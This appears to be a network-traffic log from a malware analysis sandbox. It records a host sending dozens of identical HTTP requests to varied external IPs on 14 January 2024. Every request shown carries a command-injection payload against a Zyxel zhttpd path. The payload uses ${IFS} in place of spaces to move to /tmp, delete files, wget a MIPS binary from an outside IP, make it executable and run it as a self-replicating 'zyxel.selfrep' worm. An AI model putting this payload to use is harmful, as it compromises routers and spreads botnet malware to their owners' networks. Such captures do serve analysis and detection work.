                                      Jan 14, 2024 15:50:55.505633116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6661192.168.2.1450134176.152.198.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505697012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6662192.168.2.1455542125.145.202.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505732059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6663192.168.2.1458476111.185.185.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505762100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6664192.168.2.14373369.55.208.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505796909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6665192.168.2.1435732175.124.215.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505822897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6666192.168.2.145830447.128.6.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505867958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6667192.168.2.1456126186.189.89.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505902052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6668192.168.2.145387675.231.174.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505935907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6669192.168.2.1451750130.169.77.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.505964041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6670192.168.2.14577702.223.46.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506000042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6671192.168.2.144033680.71.224.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506042004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6672192.168.2.146022888.32.102.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506082058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6673192.168.2.144993843.111.253.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506128073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6674192.168.2.144179027.192.168.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506159067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6675192.168.2.145811645.154.56.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506203890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6676192.168.2.144561453.64.182.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506264925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6677192.168.2.145957212.255.230.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506299019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6678192.168.2.1436364114.210.29.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506335020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6679192.168.2.1458268176.123.200.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506369114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6680192.168.2.143651058.7.188.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506392956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6681192.168.2.144463865.44.251.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506449938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6682192.168.2.1454650202.233.182.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506484985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6683192.168.2.1433260200.42.0.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506514072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6684192.168.2.1434222177.120.92.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506542921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6685192.168.2.143769637.67.197.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506584883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6686192.168.2.1433236198.167.192.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506623983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6687192.168.2.144952470.2.29.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506664991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6688192.168.2.145717619.13.204.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506706953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6689192.168.2.143966824.89.191.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506750107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6690192.168.2.1447842169.62.164.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506779909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6691192.168.2.1451740122.200.48.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506828070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6692192.168.2.145528097.77.56.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506858110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6693192.168.2.144617252.177.99.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506902933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6694192.168.2.144859854.15.212.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506931067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6695192.168.2.145109498.126.91.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.506967068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6696192.168.2.144479081.30.74.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507014036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6697192.168.2.1440942114.233.33.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507060051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6698192.168.2.1442566114.131.170.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507083893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6699192.168.2.145678017.27.238.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507153034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6700192.168.2.144270868.250.133.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507200003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6701192.168.2.143450482.36.49.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507252932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6702192.168.2.14482285.255.170.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507291079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6703192.168.2.1438086124.90.226.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507335901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6704192.168.2.1445380112.97.95.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507396936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6705192.168.2.144452260.186.148.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507435083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6706192.168.2.145953684.166.236.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507472992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6707192.168.2.1447068115.87.123.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507517099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6708192.168.2.1438856222.167.145.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507567883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6709192.168.2.1440640156.149.203.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507601976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6710192.168.2.1449324216.41.155.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507642031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6711192.168.2.1448338174.40.53.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507680893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6712192.168.2.1459962200.114.47.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507704973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6713192.168.2.14504641.108.186.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507751942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6714192.168.2.1447576174.207.66.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507781982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6715192.168.2.1452968171.161.224.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507826090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6716192.168.2.14366788.102.148.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507879972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6717192.168.2.1457918181.156.154.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507910967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6718192.168.2.144262824.155.208.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507951021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6719192.168.2.1434510139.21.175.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.507980108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6720192.168.2.1447586142.225.17.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508028984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6721192.168.2.1455446103.187.40.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508085966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6722192.168.2.1439470185.133.129.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:55.508106947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6723192.168.2.145659868.197.44.141443
                                      TimestampBytes transferredDirectionData
